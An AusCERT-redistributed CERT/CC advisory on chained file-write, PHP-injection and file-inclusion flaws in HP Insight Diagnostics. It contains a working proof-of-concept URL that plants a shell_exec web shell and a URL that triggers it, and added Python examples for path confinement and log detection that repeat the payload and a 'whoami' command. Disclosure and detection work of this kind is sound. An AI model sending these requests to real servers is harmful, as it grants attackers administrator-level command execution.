===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2013.0852
        HP Insight Diagnostics 9.4.0.4710 multiple vulnerabilities
                               18 June 2013

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           HP Insight Diagnostics
Publisher:         CERT/CC
Operating System:  Windows
                   UNIX variants (UNIX, Linux, OSX)
Impact/Access:     Execute Arbitrary Code/Commands -- Existing Account
                   Modify Arbitrary Files          -- Existing Account
Resolution:        Mitigation
CVE Names:         CVE-2013-3575 CVE-2013-3574 CVE-2013-3573

Original Bulletin: 
   http://www.kb.cert.org/vuls/id/324668

Comment: At the time of the publication of this bulletin, HP has not provided 
         patches to solve these vulnerabilities.
         
         To mitigate this issue, AusCERT recommends that administrators restrict
         access by only allowing connections from trusted hosts and networks.

--------------------------BEGIN INCLUDED TEXT--------------------

Vulnerability Note VU#324668
HP Insight Diagnostics 9.4.0.4710 multiple vulnerabilities

Original Release date: 10 Jun 2013 | Last revised: 10 Jun 2013

HP Insight Diagnostics 9.4.0.4710, and possibly earlier versions, contains 
multiple vulnerabilities.

Description

It has been reported that HP Insight Diagnostics 9.4.0.4710, and possibly 
earlier versions, contains multiple vulnerabilities that a remote attacker can 
chain to execute arbitrary PHP code, and therefore arbitrary operating-system 
commands, with administrative privileges.

CWE-74: Improper Neutralization of Special Elements in Output Used by a 
Downstream Component ('Injection') - CVE-2013-3573

CWE-73: External Control of File Name or Path - CVE-2013-3574

HP Insight Diagnostics contains two vulnerabilities which together allow an 
attacker to inject arbitrary data into a file that is stored at an arbitrary 
location on the server. The location is taken from the "devicePath" parameter 
(the same parameter is named "mount" in other versions). In the proof-of-concept 
request below, "devicePath" selects the web-served help directory as the 
destination (CVE-2013-3574), and the value of "leftFileName", which percent-
decodes to <?=shell_exec($_REQUEST[0]);?>, is the PHP code injected into the 
written file (CVE-2013-3573):

https://<host>:2381/hpdiags/frontend2/commands/saveCompareConfig.php?filename=comparesurvey&target=winhardrive&device=&devicePath=C:/hp/hpsmh/data/htdocs/hpdiags/frontend2/help/&category=all&advanced=yes&leftFile=surveybase.xml&leftFileName=<%3f=shell_exec($_REQUEST[0])%3b%3f>&rightFile=survey.lastwebsession.xml&rightFileName=-&changesOnly=yes&overwrite=yes

CWE-98: Improper Control of Filename for Include/Require Statement in PHP 
Program - CVE-2013-3575

HP Insight Diagnostics contains a local file inclusion vulnerability. The 
included path is limited to ".html" files inside the 
"<document-root>/hpdiags/frontend2/help/" directory, but because the file is 
included by PHP rather than served as a static document, any PHP code already 
placed in such a file (for example by the write described above) is executed.

https://<host>:2381/hpdiags/frontend2/help/pageview.php?path=comparesurvey.html
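The two weaknesses above (CWE-73 on the write side, CWE-98 on the include side) share one root cause: the client chooses a path and the server trusts it. The following is an added example, written for this bulletin in Python and not HP's PHP code or a vendor fix, of the control that closes both: the client may supply only a bare file name, the server fixes the directory and the extension, and the resolved path is checked to remain inside that directory after symlink resolution. The function and directory names are illustrative; the test inputs are taken from the proof-of-concept request in the note.

```python
"""Added example (illustrative Python, not HP's code and not a vendor fix):
the path controls that CWE-73 and CWE-98 call for. Names are hypothetical."""
import os
import re
import tempfile

# A plain file name: no separators, no drive letters, no leading dot, no PHP tags.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-][A-Za-z0-9._-]{0,63}")


def confined_path(base_dir, user_name, suffix):
    """Map a client-supplied name onto a server-chosen directory and extension.
    Returns the resolved absolute path, or None when the name is not a plain
    file name or the resolved path escapes base_dir (symlinks included)."""
    if not SAFE_NAME.fullmatch(user_name):          # rejects '/', '\\', '..', ':', '<?'
        return None
    base = os.path.realpath(base_dir)
    full = os.path.realpath(os.path.join(base, user_name + suffix))
    if os.path.commonpath([base, full]) != base:    # containment after symlink resolution
        return None
    return full


def save_compare_config(store_dir, filename, data):
    """Hardened counterpart of the saveCompareConfig.php pattern: there is no
    devicePath, the directory is store_dir (chosen by the server, outside the
    document root) and the extension is always .xml, so nothing written here is
    ever served or included by the web application. Content is written as bytes."""
    path = confined_path(store_dir, filename, ".xml")
    if path is None:
        raise ValueError("invalid filename")
    with open(path, "wb") as f:
        f.write(data)
    return path


def help_page_path(help_dir, name):
    """Hardened counterpart of pageview.php?path=: bare name, always .html, always
    under help_dir. The caller must read and send the file as a static document;
    include()-ing it would still execute any PHP tags planted in it."""
    return confined_path(help_dir, name, ".html")


def run_checks():
    """Exercise the controls with inputs from the advisory's request and return
    the outcomes as a dict so they can be inspected or asserted."""
    with tempfile.TemporaryDirectory() as store, tempfile.TemporaryDirectory() as help_dir:
        results = {
            "plain_name": help_page_path(help_dir, "comparesurvey"),
            "traversal": help_page_path(help_dir, "../../../index"),
            "absolute": help_page_path(help_dir, "C:/hp/hpsmh/data/htdocs/hpdiags/frontend2/help/"),
            "php_tag": help_page_path(help_dir, "<?=shell_exec($_REQUEST[0]);?>"),
            "dot_dot": help_page_path(help_dir, ".."),
        }
        results["plain_name_inside_help"] = (
            results["plain_name"] == os.path.join(os.path.realpath(help_dir), "comparesurvey.html"))
        payload = b"<?=shell_exec($_REQUEST[0]);?>"
        saved = save_compare_config(store, "comparesurvey", payload)
        with open(saved, "rb") as f:
            results["saved_bytes_unchanged"] = f.read() == payload
        results["saved_inside_store"] = os.path.dirname(saved) == os.path.realpath(store)
        results["saved_name"] = os.path.basename(saved)
        results["help_dir_untouched"] = os.listdir(help_dir) == []
    return results


if __name__ == "__main__":
    for key, value in run_checks().items():
        print(f"{key}: {value!r}")
```

The write side still accepts the PHP payload as content, and that is the point: once the file can only land outside the document root with a non-executable extension, and the include side only ever serves static .html from a fixed directory, attacker-controlled bytes are data and nothing more.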

Impact

By combining these vulnerabilities, an authenticated remote attacker may be 
able to execute arbitrary commands on the server with administrator privileges.

Solution

We are currently unaware of a practical solution to this problem.

Restrict Network Access

As a general good security practice, only allow connections from trusted hosts 
and networks. Restricting access would prevent an attacker from connecting to 
the service from a blocked network location.
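Until a patch exists, the network restriction above can be paired with monitoring of the web server's access log for the two request patterns in the note. What follows is an added example written for this bulletin, not code from CERT/CC, HP or the reporter. It assumes Apache/NCSA combined-format access-log lines (the note does not state the HP SMH log format); the sample lines are constructed for the example, and the "0=whoami" parameter on the final request is an assumption that mirrors the $_REQUEST[0] in the proof-of-concept. Beyond the single requests, it correlates per client: a write of PHP into the help directory followed by a pageview.php include from the same address is reported as the complete chain.

```python
"""Added detection example for VU#324668 (not code from CERT/CC, HP or the
reporter). Assumes Apache/NCSA combined access-log lines; sample lines are
constructed, and the "0=whoami" parameter is an assumption that mirrors the
$_REQUEST[0] in the note's proof-of-concept."""
import re
from urllib.parse import parse_qs, urlsplit

HELP_DIR = "hpdiags/frontend2/help"
PHP_TAG = re.compile(r"<\?|<%|\?>")
DANGEROUS = re.compile(r"\b(shell_exec|exec|system|passthru|popen|eval)\s*\(", re.I)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# The note's proof-of-concept request path and query, verbatim apart from the host.
POC_URL = ("/hpdiags/frontend2/commands/saveCompareConfig.php?filename=comparesurvey"
           "&target=winhardrive&device=&devicePath=C:/hp/hpsmh/data/htdocs/hpdiags/"
           "frontend2/help/&category=all&advanced=yes&leftFile=surveybase.xml"
           "&leftFileName=<%3f=shell_exec($_REQUEST[0])%3b%3f>"
           "&rightFile=survey.lastwebsession.xml&rightFileName=-&changesOnly=yes&overwrite=yes")

SAMPLE_LOG = [  # constructed for this example
    '10.0.0.5 - admin [18/Jun/2013:09:00:01 +1000] "GET /hpdiags/frontend2/help/'
    'pageview.php?path=comparesurvey.html HTTP/1.1" 200 4123',
    f'10.0.0.66 - admin [18/Jun/2013:09:05:10 +1000] "GET {POC_URL} HTTP/1.1" 200 512',
    '10.0.0.66 - admin [18/Jun/2013:09:05:12 +1000] "GET /hpdiags/frontend2/help/'
    'pageview.php?path=comparesurvey.html&0=whoami HTTP/1.1" 200 77',
]


def query_params(url):
    """Decode the query string; parse_qs undoes percent-encoding, so the %3f and
    %3b in the proof-of-concept come back as '?' and ';'."""
    return {k: v[0] for k, v in
            parse_qs(urlsplit(url).query, keep_blank_values=True).items()}


def classify(url):
    """Findings for one request as (cve, detail) pairs; empty for benign traffic."""
    path = urlsplit(url).path.lower()
    p = query_params(url)
    out = []
    if path.endswith("/hpdiags/frontend2/commands/savecompareconfig.php"):
        # CVE-2013-3574: the client chooses the destination directory
        dest = p.get("devicePath", p.get("mount", "")).replace("\\", "/").lower()
        if HELP_DIR in dest:
            out.append(("CVE-2013-3574", "devicePath targets the help directory: " + dest))
        # CVE-2013-3573: client-supplied strings are written into that file
        for name in ("leftFileName", "rightFileName", "filename"):
            val = p.get(name, "")
            if PHP_TAG.search(val) or DANGEROUS.search(val):
                out.append(("CVE-2013-3573", f"PHP code in {name}: {val}"))
    elif path.endswith("/hpdiags/frontend2/help/pageview.php"):
        # CVE-2013-3575: ordinary help views look like this too, so on its own only
        # an unexpected target is a finding; the chain is handled in scan()
        target = p.get("path", "")
        if ".." in target or not target.lower().endswith(".html"):
            out.append(("CVE-2013-3575", "unexpected include target: " + target))
    return out


def scan(lines):
    """Correlate per client: a planted write followed by any pageview.php include
    from the same address is the full chain the note describes."""
    planted, alerts = set(), []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, url = m.group("ip"), m.group("url")
        for cve, detail in classify(url):
            alerts.append((ip, cve, detail))
            if cve in ("CVE-2013-3573", "CVE-2013-3574"):
                planted.add(ip)
        if ip in planted and urlsplit(url).path.lower().endswith("/help/pageview.php"):
            alerts.append((ip, "CHAIN", "include after planted write: " + url))
    return alerts


if __name__ == "__main__":
    for ip, cve, detail in scan(SAMPLE_LOG):
        print(ip, cve, detail)
```

Run against the constructed log, the administrator's help lookup from 10.0.0.5 produces nothing, while 10.0.0.66 yields the two write-side findings and then the chain alert on its include. Because pageview.php is also the legitimate help viewer, alerting on that endpoint only after a planted write from the same client keeps the rule usable on a busy SMH host.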

Vendor Information

Vendor                    Status     Date Notified   Date Updated
Hewlett-Packard Company   Affected   05 Apr 2013     06 Jun 2013


CVSS Metrics

Group           Score   Vector
Base            7.4     AV:A/AC:M/Au:S/C:C/I:C/A:C
Temporal        5.7     E:U/RL:U/RC:UC
Environmental   5.2     CDP:LM/TD:M/CR:ND/IR:ND/AR:ND

References

    http://cwe.mitre.org/data/definitions/73.html
    http://cwe.mitre.org/data/definitions/74.html
    http://cwe.mitre.org/data/definitions/98.html
    http://www.hp.com/servers/diags
    http://bizsupport2.austin.hp.com/bc/docs/support/SupportManual/c03652816/c03652816.pdf

Credit

Thanks to Markus Wulftange from Daimler TSS for reporting this vulnerability.

This document was written by Michael Orlando.

Other Information

    CVE IDs: CVE-2013-3573 CVE-2013-3574 CVE-2013-3575
    Date Public: 10 Jun 2013
    Date First Published: 10 Jun 2013
    Date Last Updated: 10 Jun 2013
    Document Revision: 13

Feedback

If you have feedback, comments, or additional information about this 
vulnerability, please send us email.

--------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members.  As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin.  It may
not be updated when updates to the original are made.  If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above.  If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        http://www.auscert.org.au/render.html?cid=1980

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================